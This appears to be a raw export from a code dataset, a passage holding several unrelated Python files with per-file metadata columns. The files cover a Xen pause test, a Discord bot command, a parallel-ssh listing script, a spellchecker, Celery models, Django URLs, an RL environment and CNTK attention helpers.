fen.yes_button=ttk.Button(fen.toplevel_dialog,text='Ok',width=48,command=Close_Toplevel) fen.yes_button.grid(row=4) def Close_Toplevel (): fen.wm_attributes("-disable",False) fen.toplevel_dialog.destroy() fen.deiconify() menu() fen.mainloop()
37.322545
152
0.657667
9,570
68,039
4.566353
0.050888
0.135835
0.161876
0.047323
0.886728
0.878261
0.868993
0.865492
0.863204
0.857895
0
0.021911
0.190376
68,039
1,822
153
37.34303
0.771394
0.062861
0
0.872385
0
0
0.082338
0
0
0
0
0
0
1
0.04742
false
0.019526
0.004184
0
0.070432
0.001395
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
e7cfb5f65289821950b5026983f1eb4b8e97063e
1,829
py
Python
xen/xen-4.2.2/tools/xm-test/tests/unpause/01_unpause_basic_pos.py
zhiming-shen/Xen-Blanket-NG
47e59d9bb92e8fdc60942df526790ddb983a5496
[ "Apache-2.0" ]
1
2018-02-02T00:15:26.000Z
2018-02-02T00:15:26.000Z
xen/xen-4.2.2/tools/xm-test/tests/unpause/01_unpause_basic_pos.py
zhiming-shen/Xen-Blanket-NG
47e59d9bb92e8fdc60942df526790ddb983a5496
[ "Apache-2.0" ]
null
null
null
xen/xen-4.2.2/tools/xm-test/tests/unpause/01_unpause_basic_pos.py
zhiming-shen/Xen-Blanket-NG
47e59d9bb92e8fdc60942df526790ddb983a5496
[ "Apache-2.0" ]
1
2019-05-27T09:47:18.000Z
2019-05-27T09:47:18.000Z
#!/usr/bin/python # Copyright (C) International Business Machines Corp., 2005 # Author: Paul Larson <pl@us.ibm.com> # Description: # Positive Tests: # Tests for xm unpause # 1) Create domain, verify it's up with console # 2) randomly pause and unpause the domain # 3) unpause it one last time # 4) verify it's still alive with console import time import commands from random import * from XmTestLib import * # Create a domain (default XmTestDomain, with our ramdisk) domain = XmTestDomain() # Start it try: console = domain.start() except DomainError, e: if verbose: print "Failed to create test domain because:" print e.extra FAIL(str(e)) try: # Make sure a command succeeds run = console.runCmd("ls") except ConsoleError, e: FAIL(str(e)) # Close the console domain.closeConsole() seed(time.time()) for i in range(100): pauseit = randint(0,1) if(pauseit): # Pause the domain status, output = traceCommand("xm pause %s" % domain.getName()) if status != 0: FAIL("xm pause returned invalid %i != 0", status) else: # Unpause the domain status, output = traceCommand("xm unpause %s" % domain.getName()) if status != 0: FAIL("xm unpause returned invalid %i != 0", status) # Make sure the domain is unpaused before we finish up status, output = traceCommand("xm unpause %s" % domain.getName()) if status != 0: FAIL("xm unpause returned invalid %i != 0", status) # Are we still alive after all that? try: console = domain.getConsole() run = console.runCmd("ls") except ConsoleError, e: FAIL(str(e)) # Close the console domain.closeConsole() if run["return"] != 0: FAIL("console failed to attach to supposedly unpaused domain") # Stop the domain (nice shutdown) domain.stop()
23.753247
73
0.663204
253
1,829
4.794466
0.434783
0.037098
0.019786
0.064303
0.359439
0.340478
0.304204
0.304204
0.280297
0.280297
0
0.014134
0.226353
1,829
76
74
24.065789
0.84311
0.329688
0
0.475
0
0
0.2
0
0
0
0
0
0
0
null
null
0
0.1
null
null
0.05
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
e7d05b674fc0a756fe709726953552b8a0021a86
1,420
py
Python
commands/elections.py
Nichodon/Democracy-Bot
708613944b25f7331b18153e5f90c18f44e38aff
[ "MIT" ]
null
null
null
commands/elections.py
Nichodon/Democracy-Bot
708613944b25f7331b18153e5f90c18f44e38aff
[ "MIT" ]
null
null
null
commands/elections.py
Nichodon/Democracy-Bot
708613944b25f7331b18153e5f90c18f44e38aff
[ "MIT" ]
null
null
null
import asyncio from demobot.utils import * from demobot.handlers import add_message_handler, nested_get, nested_set, nested_pop from commands.utilities import save async def running(Demobot, msg, reg): if nested_get(msg.server.id, "roles", 'citizen') in msg.author.roles: aliases = { 'rep': 'representative', 'representative': 'representative', 'ld': 'leader', 'pres': 'leader', 'president': 'leader', 'leader': 'leader' } if reg.group('pos') not in aliases: return dmm = await Demobot.send_message(msg.author, "DM me a description for " + aliases[reg.group('pos')] + ".") m = await Demobot.wait_for_message(timeout=600, author=msg.author, channel=dmm.channel) if not m: m = "*No description given*" else: m = m.content nested_pop(msg.server.id, 'elections', aliases[reg.group('pos')], msg.author.id) nested_set(Candidate(m, msg.author.id), msg.server.id, 'elections', aliases[reg.group('pos')], msg.author.id) await Demobot.send_message(msg.author, "You are now running.") await save(None, None, None, overrideperms=True) else: await Demobot.send_message(msg.channel, "You must be a citizen!") add_message_handler(running, r'I\s*(?:(?:want|would\s*like)\s*to\s*run|am\s*running)\s*for\s*(?P<pos>.*?)\Z')
43.030303
117
0.619718
188
1,420
4.601064
0.409574
0.072832
0.050867
0.079769
0.217341
0.187283
0.113295
0.113295
0.113295
0.113295
0
0.002747
0.230986
1,420
32
118
44.375
0.789377
0
0
0.068966
0
0.034483
0.209155
0.053521
0
0
0
0
0
1
0
false
0
0.137931
0
0.172414
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
e7d0a01dfe244608cccd3bc500765f871dee666f
861
py
Python
python/p-test.py
kettlewell/bashisms
c6222424984264c7c6488f20ea5591ff5078d040
[ "MIT" ]
null
null
null
python/p-test.py
kettlewell/bashisms
c6222424984264c7c6488f20ea5591ff5078d040
[ "MIT" ]
null
null
null
python/p-test.py
kettlewell/bashisms
c6222424984264c7c6488f20ea5591ff5078d040
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 ''' Force Python3 ''' from __future__ import print_function from pprint import pprint from pssh.pssh_client import ParallelSSHClient from pssh.exceptions import AuthenticationException, \ UnknownHostException, ConnectionErrorException import pssh.utils pssh.utils.enable_host_logger() hosts = ['vm-dc-js00001-dnguyen.svale.netledger.com'] client = ParallelSSHClient(hosts,proxy_host='nx') try: print("before run_command") output = client.run_command('ls -ltrh /home/mkettlewell', stop_on_errors=False) print("after run_command") client.join(output) print(output) for host in output: for line in output[host]['stdout']: print("Host %s - output: %s" % (host, line)) except (AuthenticationException, UnknownHostException, ConnectionErrorException): print("exception...") pass
23.27027
83
0.732869
100
861
6.17
0.55
0.048622
0.21718
0
0
0
0
0
0
0
0
0.009629
0.155633
861
36
84
23.916667
0.839065
0.04065
0
0
0
0
0.173594
0.050122
0
0
0
0
0
1
0
false
0.047619
0.238095
0
0.238095
0.333333
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e7d2d32363335e20bef823b3804fd88486bdc7c4
122
py
Python
blocky_hardware.py
curlyz/blocky
ef23f81bd27a7a5cf34ec10b35dd9ca3fbd67691
[ "MIT" ]
null
null
null
blocky_hardware.py
curlyz/blocky
ef23f81bd27a7a5cf34ec10b35dd9ca3fbd67691
[ "MIT" ]
null
null
null
blocky_hardware.py
curlyz/blocky
ef23f81bd27a7a5cf34ec10b35dd9ca3fbd67691
[ "MIT" ]
null
null
null
Port1 = { "pin1" : 33 , "pin2" : 32 , "adc" : 33} #ICSP Cable Port2 = { "pin1" : 13 , "pin2" : 14 , "adc" : 34} #MP3 Port
61
62
0.491803
18
122
3.333333
0.777778
0
0
0
0
0
0
0
0
0
0
0.211111
0.262295
122
2
63
61
0.455556
0.147541
0
0
0
0
0.215686
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
4
e7d2ffd3f7f2be532081ab4ccbd72d2f7d534660
1,968
py
Python
text_mode.py
JacekPrzemieniecki/UNIFAC
c32702aeffd695a9fd3883cf150500e902df7a97
[ "MIT" ]
6
2016-01-04T02:33:13.000Z
2021-07-18T08:32:51.000Z
text_mode.py
JacekPrzemieniecki/UNIFAC
c32702aeffd695a9fd3883cf150500e902df7a97
[ "MIT" ]
1
2020-07-27T17:56:23.000Z
2020-08-10T06:30:06.000Z
text_mode.py
JacekPrzemieniecki/UNIFAC
c32702aeffd695a9fd3883cf150500e902df7a97
[ "MIT" ]
6
2015-01-02T19:18:16.000Z
2021-04-16T08:12:14.000Z
''' Created on 16-10-2012 @author: Jacek Przemieniecki ''' from unifac.facade import Facade #@UnresolvedImport class UI(object): def __init__(self): self.facade = Facade() def parse_file(self, f): """ Opens the file from patch f and executes commands inside""" with open(f) as raw_file: line_number = 1 commands = raw_file.readlines() try: for line in commands: self.run_command(line) line_number += 1 except Exception: # TODO: Exception handling raise def run_command(self, line): """Available commands: ADD <smiles> <quantity> <smiles> - SMILES notation of compound added <quantity> - amount (in moles) of compound REMOVE <smiles> <quantity> <smiles> - SMILES notation of compound removed <quantity> - amount (in moles) of compound PRINT prints calculation results for current solution RESET resets the solution""" command = line.split()[0] parameters = line.split()[1:3] if command == "ADD": self.facade.add_molecule_smiles(parameters[0], float(parameters[1])) elif command == "REMOVE": self.facade.add_molecule_smiles(parameters[0], float(-parameters[1])) elif command == "PRINT": self.print_result(parameters[0]) elif command == "RESET": self.facade.reset_solution() elif command == "TEMPERATURE": self.facade.set_temperature(float(parameters[0])) else: raise Exception() # TODO: Exception handling CommandError("Unknown command: %s" % command) def print_result(self, iden): print("Activity coefficient for: ", iden, " ", self.facade.get_coeff(iden)) ui = UI() while 1: ui.run_command(input())
31.741935
102
0.571138
211
1,968
5.227488
0.421801
0.054397
0.019946
0.054397
0.253853
0.253853
0.197643
0.11786
0.11786
0.11786
0
0.015072
0.325711
1,968
61
103
32.262295
0.816127
0.292683
0
0
0
0
0.044152
0
0
0
0
0.032787
0
1
0.117647
false
0
0.029412
0
0.176471
0.088235
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
e7d451a5141cd5cf0b8b79bacc909a39ece22eab
848
py
Python
ping.py
FoxUnderGround/Ping-Plot
4a61b147c2e1f4ee79cd77ea8500fc70175b59c7
[ "MIT" ]
1
2020-03-06T14:18:34.000Z
2020-03-06T14:18:34.000Z
ping.py
FoxUnderGround/Ping-Plot
4a61b147c2e1f4ee79cd77ea8500fc70175b59c7
[ "MIT" ]
null
null
null
ping.py
FoxUnderGround/Ping-Plot
4a61b147c2e1f4ee79cd77ea8500fc70175b59c7
[ "MIT" ]
null
null
null
from pythonping import ping import matplotlib.pyplot as plt import matplotlib.animation as animation from matplotlib import style style.use('fivethirtyeight') fig = plt.figure() ax1 = fig.add_subplot(1,1,1) xs_min=[0] ys_min=[5] def animate(z): ping_out = ping('8.8.8.8', count = 2) ping_arr = str(ping_out)[len(str(ping_out))-28:].split(" ") print(ping_arr) for i in range(len(ping_arr)): if len(ping_arr[i]) > 10: time_min = ping_arr[i].split("/")[0] print(time_min) xs_min.append(float(len(xs_min))) ys_min.append(float(time_min)) #print(xs_min) #print(ys_min) ax1.clear() ax1.plot(xs_min[-50:],ys_min[-50:],linewidth=2) ani = animation.FuncAnimation(fig, animate, interval=50) plt.show() print(xs_min)
21.74359
64
0.610849
129
848
3.844961
0.410853
0.060484
0.012097
0
0
0
0
0
0
0
0
0.03888
0.241745
848
38
65
22.315789
0.732504
0.03066
0
0
0
0
0.030691
0
0
0
0
0
0
1
0.041667
false
0
0.166667
0
0.208333
0.125
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
e7d57733a14bd14b22ac54f00ccfc5903ce8b1c4
669
py
Python
cumulusci/tasks/robotframework/tests/TestLibrary.py
jdominiczak/CumulusCI
f706c1906f9eb6d604c571a9dd16f5d0ed38599f
[ "BSD-3-Clause" ]
163
2018-09-13T18:49:34.000Z
2022-03-25T08:37:15.000Z
cumulusci/tasks/robotframework/tests/TestLibrary.py
jdominiczak/CumulusCI
f706c1906f9eb6d604c571a9dd16f5d0ed38599f
[ "BSD-3-Clause" ]
1,280
2018-09-11T20:09:37.000Z
2022-03-31T18:40:21.000Z
cumulusci/tasks/robotframework/tests/TestLibrary.py
jdominiczak/CumulusCI
f706c1906f9eb6d604c571a9dd16f5d0ed38599f
[ "BSD-3-Clause" ]
125
2015-01-17T16:05:39.000Z
2018-09-06T19:05:00.000Z
# from cumulusci.robotframework.utils import selenium_retry # The following decorator is commented out, because with it the # library gets two extra keywords. I'm not certain if that's what # should be happening, or if those two keywords are actually just # helper functions that are accidentially ending up as keywords # @selenium_retry class TestLibrary(object): """Documentation for the TestLibrary library.""" def library_keyword_one(self): """Keyword documentation with *bold* and _italics_""" return "this is keyword one from TestLibrary.py" def library_keyword_two(self): return "this is keyword two from TestLibrary.py"
35.210526
65
0.748879
92
669
5.358696
0.630435
0.052738
0.068966
0.077079
0
0
0
0
0
0
0
0
0.185351
669
18
66
37.166667
0.904587
0.623318
0
0
0
0
0.330508
0
0
0
0
0
0
1
0.4
false
0
0
0.2
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
e7d5c15d7006467f20bff9ef1db02036b30e8aa0
3,875
py
Python
python/spellcheck.py
andrewgaul/src
4dd18eaf692c1a3740b00c68b3c088842d958e7a
[ "MIT" ]
null
null
null
python/spellcheck.py
andrewgaul/src
4dd18eaf692c1a3740b00c68b3c088842d958e7a
[ "MIT" ]
null
null
null
python/spellcheck.py
andrewgaul/src
4dd18eaf692c1a3740b00c68b3c088842d958e7a
[ "MIT" ]
null
null
null
#!/usr/bin/env python '''spellcheck.py - parse source code and spell check comments, strings, or all tokens. Usage: find $SRCDIR -name \*.java | spellcheck.py --dict /usr/share/dict/words Most users will need a large custom dictionary of technical terms, e.g., HTTP, malloc, etc. Users may want to pipe output through "sort | uniq -c | sort -n" to find unusual and often incorrect spellings. ''' __VERSION__ = 20180615 # TODO: allow compoundwords? # TODO: bundle standard programming dictionary # TODO: calculate edit distance from misspellings to likely spellings # TODO: control word-splitting: camelCase, contractions, hyphenation # TODO: diff mode for pre-push hooks # TODO: emit file names and line numbers # TODO: ignore comments, /* */, //, # # TODO: ignore hex hashes # TODO: ignore URLs # TODO: incremental mode: show new misspellings since last run # TODO: port to python 3 # TODO: show unusual spellings first (configurable limit?) # TODO: single- and double-quote strings # TODO: upper-case letters # compare with: http://pypi.python.org/pypi/scspell import argparse import re import string import sys STRING_CHAR = '"' def parse_stream(stream, tokenize_all): '''Parse strings from stream of source code and emit tokenized words, e.g., string = "foo bar" -> [foo, bar] "myString" -> [my, string] ''' for line in stream: string = '' in_string = False in_backslash = False last_char = None for char in line: if tokenize_all or in_string: if in_backslash: in_backslash = False yield string string = '' elif char == '\\': in_backslash = True # parse camelCase # XXX better to do this outside parse_stream? 
elif (char.isupper() and last_char is not None and last_char.isalpha() and not last_char.isupper()): yield string string = char elif char == STRING_CHAR: in_string = False yield string string = '' else: string += char else: if char == STRING_CHAR: in_string = True last_char = char if len(string) > 0: yield string string = '' translations = string.maketrans(string.ascii_uppercase, string.ascii_lowercase) deletions = string.digits + string.punctuation + string.whitespace def populate_dictionary(filename, dictionary): with open(filename, 'r') as f: for word in f: dictionary.add(word.translate(translations, deletions)) def main(): parser = argparse.ArgumentParser( description='spell check strings in source code') parser.add_argument('--dict', dest='dictionaries', action='append', required=True) parser.add_argument('--tokenize-all', dest='tokenize_all', action='store_true', default=False) args = parser.parse_args(sys.argv[1:]) all_dictionaries = set() for wordlist in args.dictionaries: populate_dictionary(wordlist, all_dictionaries) exit_code = 0 for filename in sys.stdin: filename = filename[:-1] with open(filename, 'r') as f: for my_string in parse_stream(f, args.tokenize_all): # TODO: second parser! for word in re.split("[^A-Za-z]", my_string): cword = word.translate(translations, deletions) if cword == '': continue if cword not in all_dictionaries: exit_code = 1 print(word) sys.exit(exit_code) if __name__ == '__main__': main()
33.405172
79
0.594065
450
3,875
5.002222
0.42
0.022212
0.030209
0.019547
0.039982
0.020435
0.020435
0
0
0
0
0.005281
0.315871
3,875
115
80
33.695652
0.843833
0.314065
0
0.231884
0
0
0.044376
0
0
0
0
0.017391
0
1
0.043478
false
0
0.057971
0
0.101449
0.014493
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
e7d8a57bd82d83430fc2050120ea5bf3d037a7e3
1,981
py
Python
sliding_racket/Environment.py
alizindari/Deep-Reinforcement-Learning
315aedcaaa2ba134e77c95270fd30ed5d814182c
[ "MIT" ]
1
2022-01-24T06:11:18.000Z
2022-01-24T06:11:18.000Z
sliding_racket/Environment.py
alizindari/Deep-Reinforcement-Learning
315aedcaaa2ba134e77c95270fd30ed5d814182c
[ "MIT" ]
null
null
null
sliding_racket/Environment.py
alizindari/Deep-Reinforcement-Learning
315aedcaaa2ba134e77c95270fd30ed5d814182c
[ "MIT" ]
null
null
null
import numpy as np from collections import deque from experience_replay import * from brain import * from agent import * from Hyperparameters import * class Environment: def __init__(self,x,y): param = Hyperparameters() self.x = x self.y = y self.buff = deque(maxlen= param.CHANNEL_NUM) def reset(self): self.map = np.zeros([self.x,self.y]) self.x_pos = 0 self.y_pos = np.random.randint(0,self.y) self.map[self.x_pos,self.y_pos] = 1 self.bar_init = np.random.randint(0,self.y-7) self.bar = [self.bar_init,self.bar_init+5] self.map[self.x-1,self.bar[0]:self.bar[1]] = 1 self.buff.append(self.map) self.buff.append(self.map) self.buff.append(self.map) return torch.tensor(np.stack(self.buff,axis=0),dtype= torch.float32).to('cpu') def step(self,action): self.x_pos += 1 done = False reward = 0 if self.x_pos == self.x-1 and self.map[self.x_pos,self.y_pos] == 1: reward = 5 done = True if self.x_pos == self.x-1 and self.map[self.x_pos,self.y_pos] == 0: reward = -1 done = True if action == 0: if self.bar[0] == 0: pass else: self.bar[0] -= 1 self.bar[1] -= 1 if action == 1: if self.bar[1] == self.y: pass else: self.bar[1] += 1 self.bar[0] += 1 if action == 2: pass self.map = np.zeros([self.x,self.y]) self.map[self.x_pos,self.y_pos] = 1 self.map[self.x-1,self.bar[0]:self.bar[1]] = 1 self.buff.append(self.map) return torch.tensor(np.stack(self.buff,axis=0),dtype= torch.float32).to('cpu'),reward,done
27.513889
98
0.498233
281
1,981
3.434164
0.199288
0.082902
0.066321
0.074611
0.524352
0.510881
0.472539
0.472539
0.472539
0.422798
0
0.034566
0.372034
1,981
72
99
27.513889
0.741158
0
0
0.320755
0
0
0.003029
0
0
0
0
0
0
1
0.056604
false
0.056604
0.113208
0
0.226415
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
e7da5c2603cd6fccdacd996246a799e84c9ef725
2,040
py
Python
restful_falcon/contrib/celery_results/db/model/task.py
wynterwang/restful-falcon
f246e14c8442f358c862c118ae1dfdbd93d9e0a0
[ "MIT" ]
null
null
null
restful_falcon/contrib/celery_results/db/model/task.py
wynterwang/restful-falcon
f246e14c8442f358c862c118ae1dfdbd93d9e0a0
[ "MIT" ]
null
null
null
restful_falcon/contrib/celery_results/db/model/task.py
wynterwang/restful-falcon
f246e14c8442f358c862c118ae1dfdbd93d9e0a0
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # __author__ = "wynterwang" # __date__ = "2020/9/18" from __future__ import absolute_import from datetime import datetime from celery import states from restful_falcon.core.db.model import Column from restful_falcon.core.db.model import Model from restful_falcon.core.db.model import Sequence from restful_falcon.core.db.type import DateTime from restful_falcon.core.db.type import Integer from restful_falcon.core.db.type import LargeBinary from restful_falcon.core.db.type import PickleType from restful_falcon.core.db.type import String from restful_falcon.core.db.type import Text class Task(Model): """ Task result/status. """ __tablename__ = "celery_taskmeta" __table_args__ = {"sqlite_autoincrement": True} id = Column(Integer, Sequence("task_id_sequence"), primary_key=True, autoincrement=True) task_id = Column(String(155), unique=True) status = Column(String(50), default=states.PENDING) result = Column(PickleType, nullable=True) date_done = Column(DateTime, default=datetime.utcnow, onupdate=datetime.utcnow, nullable=True) traceback = Column(Text, nullable=True) class TaskExtended(Task): """ For the extend result. """ __tablename__ = "celery_taskmeta" __table_args__ = {"sqlite_autoincrement": True, "extend_existing": True} name = Column(String(155), nullable=True) args = Column(LargeBinary, nullable=True) kwargs = Column(LargeBinary, nullable=True) worker = Column(String(155), nullable=True) retries = Column(Integer, nullable=True) queue = Column(String(155), nullable=True) class TaskSet(Model): """ TaskSet result. """ __tablename__ = "celery_tasksetmeta" __table_args__ = {"sqlite_autoincrement": True} id = Column(Integer, Sequence("taskset_id_sequence"), autoincrement=True, primary_key=True) taskset_id = Column(String(155), unique=True) result = Column(PickleType, nullable=True) date_done = Column(DateTime, default=datetime.utcnow, nullable=True)
31.384615
98
0.736275
253
2,040
5.675889
0.256917
0.091922
0.106546
0.131616
0.541086
0.48468
0.447075
0.238162
0.183844
0.107242
0
0.014484
0.153922
2,040
64
99
31.875
0.817497
0.063725
0
0.162162
0
0
0.084855
0
0
0
0
0
0
1
0
false
0
0.324324
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
e7db7546214ecb41828bad2746f7c33166640ce9
700
py
Python
mirari/SV/urls.py
gcastellan0s/mirariapp
24a9db06d10f96c894d817ef7ccfeec2a25788b7
[ "MIT" ]
null
null
null
mirari/SV/urls.py
gcastellan0s/mirariapp
24a9db06d10f96c894d817ef7ccfeec2a25788b7
[ "MIT" ]
18
2019-12-27T19:58:20.000Z
2022-02-27T08:17:49.000Z
mirari/SV/urls.py
gcastellan0s/mirariapp
24a9db06d10f96c894d817ef7ccfeec2a25788b7
[ "MIT" ]
null
null
null
from mirari.mirari.urls import * from django.views.generic.base import RedirectView from .views import * from .vars import * app_name = APP urlpatterns = [ path('sv/', sv__Sellpoint__TemplateView.as_view(), name='sv__Sellpoint__TemplateView'), path('api/SellpointApiView/<slug:app>/<slug:action>/<slug:model>/', Sellpoint__ApiView.as_view(), name='Sellpoint__ApiView'), path('SVbarcodeScanner/', SVbarcodeScanner__TemplateView.as_view(), name='SVbarcodeScanner__TemplateView'), path('TicketInvoiceMX/', TicketInvoiceMX__TemplateView.as_view(), name='TicketInvoiceMX__TemplateView'), path('GetTicketQR/', GetTicketQR__TemplateView.as_view(), name='GetTicketQR__TemplateView'), ]
46.666667
129
0.775714
76
700
6.75
0.368421
0.05848
0.097466
0.17154
0
0
0
0
0
0
0
0
0.085714
700
15
130
46.666667
0.801563
0
0
0
0
0
0.336662
0.242511
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
e7db7db77f02f9ba4f004fea0210493ed47227bf
168
py
Python
My/test.py
wangzihan424/Myblog
480443f2b6209f69dc8ab4e36349a41bf3c5c0a1
[ "MIT" ]
1
2018-01-01T12:31:51.000Z
2018-01-01T12:31:51.000Z
My/test.py
wangzihan424/Myblog
480443f2b6209f69dc8ab4e36349a41bf3c5c0a1
[ "MIT" ]
null
null
null
My/test.py
wangzihan424/Myblog
480443f2b6209f69dc8ab4e36349a41bf3c5c0a1
[ "MIT" ]
null
null
null
# -*- coding:utf-8 -*- class People(object): pass class People1(object): def __str__(self): return "123" p = People() print p p1 = People1() print p1
12.923077
22
0.60119
23
168
4.217391
0.695652
0
0
0
0
0
0
0
0
0
0
0.062992
0.244048
168
13
23
12.923077
0.700787
0.119048
0
0
0
0
0.020408
0
0
0
0
0
0
0
null
null
0.111111
0
null
null
0.222222
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
1
0
0
0
0
0
3
e7dbfa3534c103b51f102189f319e15ea8011535
7,178
py
Python
helpers.py
jyh764790374/R-Net-in-CNTK
2eac05cb45bc52635bb4698729805d7e12af436e
[ "Unlicense" ]
17
2018-07-27T07:09:18.000Z
2021-02-27T17:08:36.000Z
helpers.py
jyh764790374/R-Net-in-CNTK-MS-MARCO-
2eac05cb45bc52635bb4698729805d7e12af436e
[ "Unlicense" ]
null
null
null
helpers.py
jyh764790374/R-Net-in-CNTK-MS-MARCO-
2eac05cb45bc52635bb4698729805d7e12af436e
[ "Unlicense" ]
2
2018-10-17T02:51:06.000Z
2018-10-21T11:47:54.000Z
import numpy as np import cntk as C from cntk.layers.blocks import _INFERRED def OptimizedRnnStack(hidden_dim, num_layers=1, recurrent_op='gru', bidirectional=False, use_cudnn=True, name=''): if use_cudnn: W = C.parameter(_INFERRED + (hidden_dim,), init=C.glorot_uniform()) def func(x): return C.optimized_rnnstack(x, W, hidden_dim, num_layers, bidirectional, recurrent_op=recurrent_op, name=name) return func else: def func(x): return C.splice( C.layers.Recurrence(C.layers.GRU(hidden_dim))(x), C.layers.Recurrence(C.layers.GRU(hidden_dim), go_backwards=True)(x), name=name) return func def seq_loss(logits, y): prob = C.sequence.softmax(logits) return -C.log(C.sequence.last(C.sequence.gather(prob, y))) ''' def attention_pooling(inputs, inputs_weights, decode, decode_weights, keys): """ inputs: shape=(dim, n) inputs_weight: shape=(dim, dim) decode: shape=(1, dec_dim) decode_weights: shape=(dim, dec_dim) keys: shape=(1, dim) """ w_in = C.times(inputs_weights ,inputs) #shape=(dim, n) decode = C.transpose(decode, perm=(1,0)) w_dec = C.times(decode_weights ,decode) #shape=(dim, dim) S = C.tanh(C.plus(C.transpose(w_in, perm=(1,0)), C.transpose(w_dec, perm=(1,0)))) #shape=(n, dim) S = C.times(S, C.transpose(keys, perm=(1,0))) #shape=(n) S = C.ops.sequence.softmax(S, name="softmax") attention = C.transpose(C.times(inputs ,S), perm=(1,0)) return attention ''' def attention_pooling(inputs, inputs_mask, inputs_weights, decode, decode_weights, keys): """ inputs: shape=(n, dim) inputs_weight: shape=(dim, dim) decode: shape=(1, dec_dim) decode_weights: shape=(dec_dim, dim) keys: shape=(dim, 1) """ w_in = C.times(inputs, inputs_weights) #shape=(n, dim) w_dec = C.times(decode, decode_weights) #shape=(dim, 1) S = C.tanh(w_in + C.sequence.broadcast_as(w_dec, w_in)) #shape=(n, dim) S = C.element_select(inputs_mask, S, C.constant(-1e+30)) S = C.times(S, keys) #shape=(n) S = C.ops.sequence.softmax(S, name="softmax") attention = C.reduce_sum(inputs * S, axis=0) return attention ''' def 
question_pooling(inputs, inputs_dim): Wp = C.parameter(shape=(inputs_dim,inputs_dim)) Vp = C.parameter(shape=(inputs_dim, 1)) outputs_w = C.times(C.tanh(C.times(inputs, Wp)), Vp) # Vp = C.parameter(shape=(inputs_dim)) # outputs_w = C.sequence.reduce_sum(C.tanh(C.times(inputs, Wp)) * Vp, 1) outputs_w = C.sequence.softmax(inputs) outputs = outputs_w * inputs return outputs def att_weight(h_enc, h_dec, inputs_dim): w_enc = C.parameter(shape=(inputs_dim,inputs_dim)) w_dec = C.parameter(shape=(inputs_dim,inputs_dim)) wh_enc = C.times(h_enc, w_enc) wh_dec = C.times(h_dec, w_dec) s_t = C.tanh(wh_dec + wh_enc) v_t = C.parameter(shape=(inputs_dim, 1)) s_t = C.times(s_t ,v_t) # v_t = C.parameter(shape=(inputs_dim)) # s_t = C.sequence.reduce_sum(s_t * v_t, 1) wh_weight = C.sequence.softmax(s_t) return wh_weight ''' ''' def question_pooling(inputs, inputs_dim): inputs_w, inputs_mask = C.sequence.unpack(inputs, padding_value=0).outputs Wp = C.parameter(shape=(inputs_dim,inputs_dim)) Vp = C.parameter(shape=(inputs_dim,1)) outputs_w = C.times(C.tanh(C.times(inputs_w, Wp)), Vp) outputs_w = C.softmax(C.element_select(inputs_mask, outputs_w, C.constant(-1e+30)), axis=0) outputs = outputs_w * inputs_w outputs = C.reduce_sum(outputs, 0) return outputs def att_weight(h_enc, h_dec, inputs_dim): h_enc_w, h_enc_mask = C.sequence.unpack(h_enc, padding_value=0).outputs w_enc = C.parameter(shape=(inputs_dim, inputs_dim)) w_dec = C.parameter(shape=(inputs_dim, inputs_dim)) v_t = C.parameter(shape=(inputs_dim)) wh_enc = C.times(h_enc_w, w_enc) wh_dec = C.times(h_dec, w_dec) s_t = C.tanh(C.sequence.broadcast_as(wh_dec, wh_enc) + wh_enc) s_t = C.element_select(h_enc_mask, s_t, C.constant(-1e+30)) s_t = C.reduce_sum(s_t * v_t, 1) wh_weight = C.softmax(s_t) return wh_weight ''' def question_pooling(inputs, inputs_dim): outputs_w = C.layers.Dense(1, activation=C.tanh, name='out_start')(inputs) outputs_w = C.sequence.softmax(outputs_w) outputs = C.sequence.reduce_sum(outputs_w * inputs) return 
